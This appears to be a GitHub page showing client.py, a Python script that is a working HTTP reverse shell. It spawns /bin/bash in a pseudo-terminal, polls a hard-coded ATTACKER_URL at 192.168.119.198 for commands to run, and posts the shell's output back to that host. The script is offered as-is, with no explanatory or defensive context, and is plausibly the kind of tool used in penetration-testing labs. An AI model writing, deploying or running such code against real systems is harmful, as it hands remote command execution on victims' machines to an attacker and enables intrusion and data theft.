-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathclient.py
More file actions
65 lines (53 loc) · 1.38 KB
/
client.py
File metadata and controls
65 lines (53 loc) · 1.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from threading import Thread
import time
import os
import pty
import signal
import termios
import sys
try:
# For Python 3.0 and later
from urllib.request import urlopen
except ImportError:
# Fall back to Python 2's urllib2
from urllib2 import urlopen
ATTACKER_URL = 'http://192.168.119.198'
COMMAND = ['/bin/bash']
pid, master = pty.fork()
if pid == 0:
fd = sys.stdin.fileno()
# setup the new pseudo-tty
new = termios.tcgetattr(fd)
new[3] &= ~termios.ECHO # disable echo
termios.tcsetattr(fd, termios.TCSANOW, new)
os.execlp(COMMAND[0], *COMMAND)
run = True
def get_stdin():
try:
while run:
res = urlopen(ATTACKER_URL + "/stdin")
input_data = res.read()
os.write(master, input_data)
time.sleep(0.5)
except:
pass
def post_stdout():
try:
output_data = os.read(master, 1024)
while output_data is not None and len(output_data) > 0:
res = urlopen(ATTACKER_URL + "/stdout", data=output_data)
output_data = os.read(master, 100)
except:
pass
thread_stdin = Thread(target=get_stdin)
thread_stdout = Thread(target=post_stdout)
thread_stdout.daemon = True
thread_stdin.start()
thread_stdout.start()
try:
os.wait()
except KeyboardInterrupt:
os.kill(pid, signal.SIGKILL)
run = False
thread_stdin.join()
thread_stdout.join()